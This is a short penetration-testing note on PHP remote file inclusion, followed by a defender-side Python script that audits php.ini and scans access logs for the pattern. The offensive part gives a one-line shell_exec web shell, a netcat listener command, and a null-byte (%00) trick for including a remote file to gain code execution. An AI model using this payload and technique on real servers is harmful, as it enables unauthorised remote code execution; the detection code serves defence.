RFI

RFI is possible in PHP when the allow_url_include directive is set to On within php.ini.

Host an evil file via HTTP (apache2/python/etc):

<?php echo shell_exec("cmd");?>

Set up a listener for debugging: nc -lvnp 80

Call the file:

This goes to our web server and grabs the evil file. We see that it requests GET /evil.txt.php from our web server, so we add a null byte (%00) to the end of the path to stop the application from appending .php. Then it works, and since the fetched file is parsed by the PHP engine we have RCE:

A .txt extension is used because a file with a .php extension would be executed by our own web server instead of being served as source.
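Two defender-side checks for the pattern described above, as an added example that is not part of the original note: an audit of php.ini for the allow_url_include (and the related allow_url_fopen) directive from the first paragraph, and a scan of web-server access-log lines for the two signatures of the include request described above, a query parameter carrying a remote URL scheme and an appended %00. The php.ini text and the log lines are constructed samples; the parameter name `page`, the addresses and the file name are illustrative. One caveat worth knowing when triaging hits: the %00 truncation only works against PHP releases before 5.3.4, which started rejecting paths containing a NUL byte, so on current PHP the remote-URL signature is the one that matters.

```python
"""Defender-side checks for the PHP RFI pattern described in this note.

Added example (not part of the original note). Two independent checks:
  1. audit_php_ini()   - flags allow_url_include / allow_url_fopen when enabled.
  2. scan_access_log() - flags requests whose query parameters carry a remote
     URL scheme or an encoded null byte, the two signatures of the technique above.
The php.ini text and access-log lines below are constructed samples.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Directives that let include()/fopen() reach outside the document root.
RISKY_INI_DIRECTIVES = ("allow_url_include", "allow_url_fopen")
ENABLED_VALUES = {"on", "1", "true", "yes"}


def parse_php_ini(text):
    """Return {directive: value} for every 'key = value' line, ignoring ';' comments."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip().lower()] = value.strip().strip('"').lower()
    return settings


def audit_php_ini(text):
    """List the risky directives that are switched on in the given php.ini text."""
    settings = parse_php_ini(text)
    return [d for d in RISKY_INI_DIRECTIVES if settings.get(d) in ENABLED_VALUES]


# Stream wrappers that make include() fetch or synthesise code from outside the docroot.
REMOTE_SCHEME = re.compile(r"^\s*(https?|ftps?|data|php|phar|expect)\s*:", re.IGNORECASE)

# Apache/nginx "combined" format: client ident user [time] "METHOD PATH PROTO" status
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def classify_param(value):
    """Return the reasons a single query-parameter value looks like an RFI attempt."""
    reasons = []
    decoded = unquote(value)  # one extra decode so a double-encoded %2500 surfaces as %00
    if REMOTE_SCHEME.match(decoded):
        reasons.append("remote-url")
    if "\x00" in decoded or "%00" in decoded.lower():
        reasons.append("null-byte")  # the truncation trick from the note above
    return reasons


def scan_access_log(text):
    """Return one finding per suspicious (request, parameter) pair in the log text."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, method, path, status = m.groups()
        # parse_qsl percent-decodes once, so a raw %00 arrives here as a real NUL byte.
        for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
            reasons = classify_param(value)
            if reasons:
                findings.append({"client": client, "method": method, "path": path,
                                 "status": int(status), "param": name, "reasons": reasons})
    return findings


SAMPLE_PHP_INI = """\
; constructed sample, not taken from a real server
allow_url_fopen = On
allow_url_include = On
display_errors = Off
"""

# Constructed log lines: one benign request, the two-step include request from the
# note (plain URL, then URL with %00 appended), and another benign request.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=http://203.0.113.9/evil.txt HTTP/1.1" 200 77
203.0.113.7 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?page=http://203.0.113.9/evil.txt%00 HTTP/1.1" 200 77
198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=contact HTTP/1.1" 200 498
"""

if __name__ == "__main__":
    print("enabled risky directives:", audit_php_ini(SAMPLE_PHP_INI))
    for finding in scan_access_log(SAMPLE_ACCESS_LOG):
        print(finding["client"], finding["param"], finding["reasons"], finding["path"])
```

The ini audit is the cheapest control: with allow_url_include left at its default of Off, include() refuses URL wrappers outright and the request pattern in the log becomes an error rather than code execution. The log scan is what you run when you cannot change the setting, or to find out whether it was ever exercised.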
